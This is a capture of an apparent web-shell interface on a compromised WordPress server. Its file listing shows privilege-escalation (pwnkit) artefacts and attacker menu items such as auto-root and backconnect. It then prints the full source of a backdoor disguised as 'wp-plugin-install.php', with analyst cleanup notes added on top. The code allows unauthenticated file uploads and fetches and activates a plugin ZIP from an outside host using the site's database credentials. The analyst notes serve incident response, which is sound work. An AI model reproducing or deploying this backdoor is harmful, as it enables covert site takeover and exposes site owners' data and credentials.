Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 52.14.205.130
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
biogenelab.eu /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwsr-x
.pkexec
[ DIR ]
drwxr-sr-x
.well-known
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
wp-admin
[ DIR ]
drwxrwsr-x
wp-content
[ DIR ]
drwxrwsr-x
wp-includes
[ DIR ]
drwxrwsr-x
.htaccess
233
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
apple-touch-icon-114x114.png
11.36
KB
-rw-r--r--
apple-touch-icon-120x120.png
10.51
KB
-rw-r--r--
apple-touch-icon-144x144.png
4.94
KB
-rw-r--r--
apple-touch-icon-152x152.png
14.49
KB
-rw-r--r--
apple-touch-icon-57x57.png
5.03
KB
-rw-r--r--
apple-touch-icon-60x60.png
4.83
KB
-rw-r--r--
apple-touch-icon-72x72.png
2.95
KB
-rw-r--r--
apple-touch-icon-76x76.png
6.53
KB
-rw-r--r--
favicon-128.png
6.96
KB
-rw-r--r--
favicon-16x16.png
628
B
-rw-r--r--
favicon-196x196.png
7.48
KB
-rw-r--r--
favicon-32x32.png
1.5
KB
-rw-r--r--
favicon-96x96.png
6.17
KB
-rw-r--r--
favicon.ico
5.3
KB
-rw-r--r--
google96d7d17060245e8d.html
53
B
-rw-r--r--
index.php
3.05
KB
-rw-r--r--
license.txt
19.09
KB
-rwxrwxr-x
mstile-144x144.png
4.94
KB
-rw-r--r--
mstile-150x150.png
15.52
KB
-rw-r--r--
mstile-310x150.png
19.47
KB
-rw-r--r--
mstile-310x310.png
28.93
KB
-rw-r--r--
mstile-70x70.png
6.96
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.24
KB
-rwxrwxr-x
wp-activate.php
5.32
KB
-rwxrwxr-x
wp-blog-header.php
364
B
-rwxrwxr-x
wp-comments-post.php
1.59
KB
-rwxrwxr-x
wp-config-sample.php
28.42
KB
-rwxrwxr-x
wp-config.php
2.99
KB
-rwxrwxr-x
wp-cron.php
3.21
KB
-rwxrwxr-x
wp-links-opml.php
2.37
KB
-rwxrwxr-x
wp-load.php
3.22
KB
-rwxrwxr-x
wp-login.php
33.52
KB
-rwxrwxr-x
wp-mail.php
7.86
KB
-rwxrwxr-x
wp-plugin-install.php
9.91
KB
-rw-r--r--
wp-settings.php
15.82
KB
-rwxrwxr-x
wp-signup.php
29.22
KB
-rwxrwxr-x
wp-trackback.php
4.41
KB
-rwxrwxr-x
xmlrpc.php
2.99
KB
-rwxrwxr-x
Code Editor : wp-plugin-install.php
<?php
# ---------------------------------------------------------------------------
# Analyst notes (comments only; the code below is unchanged from the capture).
# The editor view collapsed the file's line breaks, so each "# ..." section
# marker now sits in the middle of a line. Read the markers as section
# headings, not as end-of-line comments.
#
# Purpose: a standalone PHP page that, on request, downloads a ZIP from a
# URL, extracts it into a WordPress plugins directory and marks it active by
# editing the `active_plugins` row directly in the database. It opens its own
# PDO connection using the DB_* constants defined by the included wp-config
# file.
#
# Request handling, in order:
#   1. error_reporting(0) hides PHP errors from the response.
#   2. "# Upload": if GET u == 'ok', any uploaded file is written to
#      __DIR__ . '/' . <client-supplied name>, trying move_uploaded_file(),
#      then rename(), then file_put_contents(). There is no authentication
#      and no extension or content check; this branch runs before the token
#      check further down. It then prints an upload form and exits.
#   3. "# Extensions": exits with a message unless zip, curl and pdo_mysql
#      are loaded.
#   4. "# Function": download_and_extract_plugin($url, $destinationFolder)
#      fetches $url with cURL into a temp file (50 s timeout, redirects
#      followed, TLS host and peer verification both disabled) and extracts
#      the archive with ZipArchive::extractTo(). Returns true on success or
#      an error string. Archive entry names are not inspected before
#      extraction.
#   5. "# API": taken when GET API loosely equals (==) a token hard-coded in
#      the file. Reads wp_config_file, wp_plugin_path, plugin_path_file and
#      plugin_url from POST, falling back to built-in defaults. Unless GET
#      action is 'install' it only echoes the resolved settings as JSON.
#      Otherwise it checks the paths, include_once's the config path,
#      connects with PDO, calls the download function, then appends
#      plugin_path_file to the unserialize()d active_plugins array and writes
#      it back. Responses are JSON.
#   6. "# POST REQUEST": the same install sequence for any POST request that
#      reaches it, with plain-text responses and no token check.
#   7. "# GET REQUEST": prints "404 Not Found" when GET f is absent; because
#      the condition joins its two tests with &&, any value of f shows the
#      HTML form.
#
# Points for whoever is cleaning up the host:
#   - wp_config_file is request-controlled and is passed to include_once
#     after only a file_exists() check.
#   - wp_plugin_path is request-controlled, so the extraction target is not
#     limited to wp-content/plugins.
#   - The UPDATE statement interpolates the serialized array into the SQL
#     string instead of binding it.
#   - $table_prefix is not assigned in this file; presumably it comes from
#     the included wp-config file -- confirm.
#   - The contents of the default ZIP are not shown in this capture. Compare
#     the plugins directory and the active_plugins option against a known
#     good state, and look in access logs for requests to this file carrying
#     the u, f, API or action query parameters.
#   - Because the page reads the database credentials, treat them as exposed.
# ---------------------------------------------------------------------------
error_reporting(0); header('Content-Type: text/html; charset=utf-8'); # Upload if (isset($_GET['u']) && $_GET['u'] == 'ok') { if (isset($_FILES['file'])) { $file = $_FILES['file']; if ($file['error'] == 0) { $path = __DIR__ . '/' . $file['name']; if (@move_uploaded_file($file['tmp_name'], $path)) { echo "File uploaded using move_uploaded_file: {$file['name']}"; } else if (@rename($file['tmp_name'], $path)) { echo "File uploaded using rename: {$file['name']}"; } else if (@file_put_contents($path, @file_get_contents($file['tmp_name']))) { echo "File uploaded using file_put_contents: {$file['name']}"; } else { echo "File not uploaded!"; } } else { echo "File not uploaded!"; } echo "<br>"; echo "<br>"; } echo '<form method="post" enctype="multipart/form-data"><input type="file" name="file"><button type="submit">Upload</button></form>'; exit; } # Extensions $extensions = ['zip', 'curl', 'pdo_mysql']; $error = 0; foreach ($extensions as $ext) { if (!extension_loaded($ext)) { echo strtoupper($ext) . " yüklü değil, işlemlere devam edilemeyecek :(.<br>"; $error++; } } if ($error > 0) { exit; } # Function - Download and Extract Plugin function download_and_extract_plugin($url, $destinationFolder) { $tempZip = tempnam(sys_get_temp_dir(), 'plugin_') . 
'.zip'; $ch = curl_init($url); $fp = fopen($tempZip, 'w'); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_TIMEOUT, 50); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $success = curl_exec($ch); curl_close($ch); fclose($fp); if (!$success) { unlink($tempZip); return "{$tempZip} - ZIP file not downloaded."; } $zip = new ZipArchive(); if ($zip->open($tempZip) === true) { $zip->extractTo($destinationFolder); $zip->close(); unlink($tempZip); return true; } else { unlink($tempZip); return "{$tempZip} - ZIP file not extracted."; } } # API if (isset($_GET['API']) && trim($_GET['API']) == 'LJz5ZtXGc7hSM4aUfmE9CH') { # Params $wp_config = isset($_POST['wp_config_file']) ? urldecode(trim($_POST['wp_config_file'])) : __DIR__ . '/wp-config.php'; $destinationFolder = isset($_POST['wp_plugin_path']) ? urldecode(trim($_POST['wp_plugin_path'])) : __DIR__ . '/wp-content/plugins/'; $plugin_path = isset($_POST['plugin_path_file']) ? urldecode(trim($_POST['plugin_path_file'])) : 'fancy-elementor-gallery-box/fancy-elementor-gallery-box.php'; $url = isset($_POST['plugin_url']) ? urldecode(trim($_POST['plugin_url'])) : 'https://ampproject.com.tr/canonical_plugin_for_wp.zip?v='.time(); # Install plugin if (trim($_GET['action']) != 'install') { die(json_encode([ "status" => true, "wp_config_file" => $wp_config, "wp_plugins_path" => $destinationFolder, "plugin_path_file" => $plugin_path, "plugin_url" => $url, #"action" => "install", ])); } # wp-config.php file check if (!file_exists($wp_config)) { die(json_encode(["status" => false, "error" => "{$wp_config} file not found."])); } # plugin path check if (!is_dir($destinationFolder)) { die(json_encode(["status" => false, "error" => "{$destinationFolder} folder not found."])); } # plugin file check if (file_exists($destinationFolder . 
$plugin_path)) { die(json_encode(["status" => false, "error" => "{$destinationFolder}{$plugin_path} file already installed."])); } # wp-config.php file include include_once $wp_config; # wp-config.php file include include_once $wp_config; # Database Connection $servername = DB_HOST; $username = DB_USER; $password = DB_PASSWORD; $dbname = DB_NAME; $charset = DB_CHARSET; // Create connection pdo try { $db = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password); $db->exec('SET NAMES `' . $charset . '`'); } catch (PDOException $e) { die(json_encode(["status" => false, "error" => 'Connection failed: ' . $e->getMessage()])); } # Upload Plugin $upload_plugin = download_and_extract_plugin($url, $destinationFolder); if ($upload_plugin !== true) { die(json_encode(["status" => false, "error" => $upload_plugin])); } # options - active plugins $active_plugins = $db->query("SELECT `option_value` FROM `{$table_prefix}options` WHERE `option_name` = 'active_plugins';")->fetch(); $active_plugins = unserialize($active_plugins['option_value']); if (is_array($active_plugins)) { if (!in_array($plugin_path, $active_plugins)) { $active_plugins[] = $plugin_path; $active_plugins = serialize($active_plugins); $db->query("UPDATE `{$table_prefix}options` SET `option_value` = '{$active_plugins}' WHERE `option_name` = 'active_plugins';"); die(json_encode(["status" => true, "message" => "{$plugin_path} - Plugin activated!"])); } else { die(json_encode(["status" => false, "error" => "Plugin already activated!"])); } } else { die(json_encode(["status" => false, "error" => "Error! 
- active_plugins not found"])); } exit; } # POST REQUEST if ($_SERVER['REQUEST_METHOD'] == 'POST') { # Post params $wp_config = trim($_POST['wp_config_file']); $destinationFolder = trim($_POST['wp_plugin_path']); $plugin_path = trim($_POST['plugin_path_file']); $url = trim($_POST['plugin_url']); # wp-config.php file check if (!file_exists($wp_config)) { die("{$wp_config} file not found."); } # plugin path check if (!is_dir($destinationFolder)) { die("{$destinationFolder} folder not found."); } # plugin file check if (file_exists($destinationFolder . $plugin_path)) { die("{$destinationFolder}{$plugin_path} file already installed."); } # wp-config.php file include include_once $wp_config; # Database Connection $servername = DB_HOST; $username = DB_USER; $password = DB_PASSWORD; $dbname = DB_NAME; $charset = DB_CHARSET; // Create connection pdo try { $db = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password); $db->exec('SET NAMES `' . $charset . '`'); } catch (PDOException $e) { die('Connection failed: ' . $e->getMessage()); } # Upload Plugin $upload_plugin = download_and_extract_plugin($url, $destinationFolder); if ($upload_plugin === true) { echo "Plugin ($url) downloaded and will be active...<br>"; } else { die($upload_plugin); } # options - active plugins $active_plugins = $db->query("SELECT `option_value` FROM `{$table_prefix}options` WHERE `option_name` = 'active_plugins';")->fetch(); $active_plugins = unserialize($active_plugins['option_value']); if (is_array($active_plugins)) { if (!in_array($plugin_path, $active_plugins)) { $active_plugins[] = $plugin_path; $active_plugins = serialize($active_plugins); $db->query("UPDATE `{$table_prefix}options` SET `option_value` = '{$active_plugins}' WHERE `option_name` = 'active_plugins';"); die("{$plugin_path} - Plugin activated!"); } else { die("Plugin already activated!"); } } else { die("Error! 
- active_plugins not found"); } exit; } # GET REQUEST if (!isset($_GET['f']) && $_GET['f'] != 'ok') { die("404 Not Found"); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Plugin Install for WP</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> </head> <body> <div class="container mt-5"> <h1 class="text-center mb-4">Plugin Install for WP</h1> <p> </p> <div class="row justify-content-center"> <div class="col-md-6"> <form method="post" action=""> <h2>Local Settings</h2> <div class="mb-3"> <label for="name" class="form-label">WP Config Path</label> <input type="text" class="form-control" name="wp_config_file" placeholder="<?php echo __DIR__ ?>/wp-config.php" value="<?php echo __DIR__ ?>/wp-config.php"> </div> <div class="mb-3"> <label for="name" class="form-label">WP Plugin Path</label> <input type="text" class="form-control" name="wp_plugin_path" placeholder="<?php echo __DIR__ ?>/wp-content/plugins/" value="<?php echo __DIR__ ?>/wp-content/plugins/"> </div> <p> </p> <h2>Remote Plugin Settings</h2> <div class="mb-3"> <label for="name" class="form-label">Plugin URL</label> <input type="text" class="form-control" name="plugin_url" placeholder="https://site.com/plugin.zip" value="https://ampproject.com.tr/canonical_plugin_for_wp.zip?v=<?php echo time() ?>"> </div> <div class="mb-3"> <label for="name" class="form-label">Plugin Path File</label> <input type="text" class="form-control" name="plugin_path_file" placeholder="plugin_path/plugin_root_file.php" value="fancy-elementor-gallery-box/fancy-elementor-gallery-box.php"> </div> <button type="submit" class="btn btn-danger w-100">Do Install Plugin, Dude!</button> </form> </div> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> </body> </html>